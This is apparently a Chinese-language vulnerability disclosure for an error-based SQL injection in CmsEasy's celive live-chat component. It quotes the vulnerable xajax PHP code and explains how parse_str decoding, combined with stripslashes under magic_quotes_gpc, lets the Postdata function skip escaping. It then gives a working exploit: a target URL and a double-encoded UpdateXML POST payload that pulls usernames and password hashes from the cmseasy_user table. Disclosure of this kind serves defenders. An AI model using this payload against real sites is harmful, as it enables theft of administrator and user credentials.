### 简要描述:
cmseasy 无限制报错注入(可获取全站信息exp)
### 详细说明:
问题还是出在clive 上面,但是跟以往的不同的是,xjxquery 这个上面就发生了问题,看代码:
xajax.class.php:
```
if ($rootTag == "xjxquery") {
$sQuery = "";
$this->iPos++;
while (!stristr($this->aObjArray[$this->iPos], "")) {
if (stristr($this->aObjArray[$this->iPos], "") || stristr($this->aObjArray[$this->iPos], "
")) {
$this->iPos++;
continue;
}
$sQuery .= $this->aObjArray[$this->iPos];
$this->iPos++;
}
parse_str($sQuery, $aArray);
if ($this->bDecodeUTF8Input) {
foreach ($aArray as $key => $value) {
$aArray[$key] = $this->_decodeUTF8Data($value);
}
}
if (get_magic_quotes_gpc() == 1) {
$newArray = array();
foreach ($aArray as $sKey => $sValue) {
if (is_string($sValue))
$newArray[$sKey] = stripslashes($sValue);
else
$newArray[$sKey] = $sValue;
}
$aArray = $newArray;
}
}
return $aArray;
}
```
问题发生在哪里了:
parse_str($sQuery, $aArray);
这个函数,本身会对url编码进行一次decode的
测试一下
```
echo $_GET['b'];
echo "
";
parse_str($_GET['b']);
echo $a;
?>
```
[
](https://images.seebug.org/upload/201508/26090436e3ebc6d9b0b2608c691b30b4744c8aae.png)
成立
第二处逻辑
如果gpc开启的话,它会进行一次stripslashes
```
if (get_magic_quotes_gpc() == 1) {
$newArray = array();
foreach ($aArray as $sKey => $sValue) {
if (is_string($sValue))
$newArray[$sKey] = stripslashes($sValue);
```
以往的 注册函数有两个前台可以利用:
Postdata 和 LiveMessage
看看LiveMessage:
```
function LiveMessage($a) {
global $db;
$sessionid = $_SESSION['sessionid'];
$name = addslashes(htmlspecialchars($a['name']));
$email = addslashes(htmlspecialchars($a['email']));
$country = addslashes(htmlspecialchars($a['country']));
$phone = addslashes(htmlspecialchars($a['phone']));
$departmentid = addslashes(htmlspecialchars($a['departmentid']));
$message = addslashes(htmlspecialchars($a['message']));
```
所有的参数都被addslashes
我们在看看:
Postdata
function Postdata($a) {
global $db;
$chatid = $_SESSION['chatid'];
$name = $_SESSION['name'];
$a['detail'] = htmlspecialchars($a['detail']);
if (!get_magic_quotes_gpc()) {
$a['detail'] = addslashes($a['detail']);
}
如果gpc开启的话,就不进行addslashes 好的 直接exp
发送url:
http://localhost/Cmseasy/celive/live/header.php
postdata:
xajax=Postdata&xajaxargs[0]=detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520
[
](https://images.seebug.org/upload/201508/2609100916fa57cd969ddf1cec6343a368635202.png)
### 漏洞证明:
2883
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
